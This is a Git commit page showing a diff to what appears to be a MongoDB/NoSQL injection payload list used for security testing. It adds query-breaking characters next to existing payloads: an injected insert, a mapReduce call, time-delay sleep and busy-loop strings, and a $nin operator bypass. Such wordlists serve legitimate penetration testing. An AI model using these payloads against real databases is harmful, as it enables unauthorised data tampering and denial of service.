Add character that can break a MongoDB query when JS expression is used
This commit is contained in:
committed by
GitHub
parent
b883fc123a
commit
00f10f8513
@@ -18,3 +18,12 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||||||
';sleep(5000);
|
';sleep(5000);
|
||||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||||
{$nin: [""]}}
|
{$nin: [""]}}
|
||||||
|
'
|
||||||
|
"
|
||||||
|
\
|
||||||
|
/
|
||||||
|
//
|
||||||
|
;
|
||||||
|
{
|
||||||
|
}
|
||||||
|
:
|
||||||
|
|||||||
Reference in New Issue
Block a user